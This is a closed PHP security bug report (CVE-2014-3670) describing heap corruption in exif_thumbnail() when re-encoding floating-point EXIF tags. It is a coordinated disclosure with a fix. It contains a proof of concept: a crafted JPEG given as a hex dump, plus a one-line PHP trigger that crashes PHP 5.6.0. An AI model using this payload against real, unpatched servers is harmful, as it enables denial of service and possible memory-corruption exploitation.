PHP :: Sec Bug #68113 :: Heap corruption in exif_thumbnail()
| Sec Bug #68113 | Heap corruption in exif_thumbnail() | ||||
|---|---|---|---|---|---|
| Submitted: | 2014-09-28 23:31 UTC | Modified: | 2014-10-14 17:41 UTC | ||
| From: | stas@php.net | Assigned: | |||
| Status: | Closed | Package: | EXIF related | ||
| PHP Version: | 5.4.33 | OS: | * | ||
| Private report: | No | CVE-ID: | 2014-3670 | ||
[2014-09-28 23:31 UTC] stas@php.net
Description: ------------ Report by Otto Ebeling: Hi, I¹d like to report a bug that causes heap corruption when parsing the thumbnail of a specially crafted .jpg image. Could you confirm that you can repro and provide an estimated timeline for releasing the fix so we can coordinate this with the HHVM team as HHVM contains the affected code as well? Details: PHP provides APIs such as exif_thumbnail that can be used to extract embedded thumbnails from various image formats. In the process of extracting a TIFF-formatted EXIF thumbnail from a JPEG image, PHP re-encodes most IFD tags present in the thumbnail directory and prepends them to the thumbnail image in order to produce a standalone TIFF file. Individual values are re-encoded using the exif_ifd_make_value function. If this function is asked to write out an array of floating point values (single or double precision), it erroneously uses the size of the whole array when copying individual elements using memmove, leading to heap corruption. See: https://github.com/php/php-src/blob/dbccc8c112e0afaa34db7a913096f849a02da4de/ext/exif/exif.c#L2447 byte_count is the length of the entire array as calculated at https://github.com/php/php-src/blob/dbccc8c112e0afaa34db7a913096f849a02da4de/ext/exif/exif.c#L2390 In addition to this, the 'from' pointer of the memmove calls point to the pointer to the array, not its contents. Instead of &info_data->value.f, the code should be using &info_value->f To exploit a target application that uses this API (or exif_read_data with suitable parameters), a malicious user can trigger this condition by supplying a tag that contains an array of floating-point values, and futher tags that indicate the presence of a TIFF thumbnail. The image itself need not be valid as long as the exif_ifd_make_value gets invoked. Example .jpg file (xxd format) that causes a SIGSEGV on PHP 5.6.0: 0000000: ffd8 ffe1 0050 4578 6966 0000 4949 2a00 .....PExif..II*. 0000010: 1500 0000 ff00 0020 0000 00ff ffff ffff ....... ........ 0000020: 1100 001d 0000 0000 0003 001a 010c 0024 ...............$ 0000030: 0000 0017 0000 0001 0204 0001 0000 0040 ...............@ 0000040: 0000 0017 0104 0001 0000 0001 0000 0000 ................ 0000050: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000060: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000070: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000080: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000090: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00000a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00000b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00000c0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00000d0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00000e0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 00000f0: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000100: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000110: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000120: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000130: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000140: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000150: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000160: 0000 0000 0000 0000 0000 0000 0000 0000 ................ Script: <?php exif_thumbnail("corrupt_heap.jpg"); ?> Regards, Otto Ebeling Facebook Security Infrastructure
Patches
exif-fix (last revision 2014-09-29 00:00 UTC by stas@php.net)Pull Requests
History
AllCommentsChangesGit/SVN commits
[2014-09-29 05:34 UTC] remi@php.net
-CVE-ID: +CVE-ID: 2014-3670
[2014-10-14 17:42 UTC] stas@php.net
-Status: Open +Status: Closed